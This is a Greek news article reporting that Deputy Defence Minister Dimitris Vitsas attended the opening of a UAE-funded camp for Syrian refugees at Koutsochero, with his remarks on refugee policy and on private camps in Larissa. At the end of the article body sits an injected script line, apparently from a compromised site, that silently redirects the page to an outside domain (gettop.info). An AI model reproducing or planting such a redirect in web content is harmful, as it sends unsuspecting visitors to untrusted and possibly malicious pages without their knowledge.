Βίτσας: Περνάμε σε δεύτερη φάση διαχείρισης του προσφυγικού

0
3

 

Εγκαίνια είχαν στον καταυλισμό των προσφύγων στο Κουτσόχερο όπου έδωσε το «παρών» ο αναπληρωτής υπουργός Εθνικής Άμυνας, Δημήτρης Βίτσας. Να σημειωθεί πως καταυλισμός έγινε με την οικονομική βοήθεια των Ηνωμένων Αραβικών Εμιράτων, με την προϋπόθεση να φιλοξενηθούν αποκλειστικά Σύροι πρόσφυγες με τις οικογένειές τους.

«Εδώ στο Κουτσόχερο, περνάμε σε μια δεύτερη φάση διαχείρισης του προσφυγικού, η οποία έχει δύο βασικά χαρακτηριστικά. Το ένα είναι η ανασυγκρότηση των υπαρχουσών δομών και η μείωση των πολλών δομών. Και το δεύτερο είναι η φιλοξενία σε σπίτια και καταλύματα. Είναι μια διαδικασία που θα κρατήσει ένα χρονικό διάστημα, αλλά προχωράμε σχετικά γρήγορα» σημείωσε ο κ. Βίτας ο οποίος επιπλέον επεσήμανε δύο επιπλέον θέματα που αφορούν τον ρόλο της ΕΕ για το προσφυγικό και τη διαχείριση του θέματος, ενώ απάντησε και στην πρόσφατη είδηση που γράφηκε στον τοπικό Τύπο, πως στην πόλη της Λάρισας υπάρχουν σκέψεις από ιδιώτες να εμπλακούν και να δημιουργήσουν δομές φιλοξενίας.

«Δεν ξέρω πού τα βρίσκουν αυτοί που τα γράφουν, αλλά εμείς προχωράμε με κλειστά αυτιά. Τώρα, αν θεωρούν ότι αυτό είναι μια είδους αντιπολίτευση, εγώ θα τα χαρακτήριζα ανώφελη και κουτή αντιπολίτευση, διότι το προσφυγικό είναι ένα εθνικό και διεθνές θέμα» είπε ο υπουργός, απορρίπτοντας οποιοδήποτε σενάριο δημιουργίας δομών από ιδιώτες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here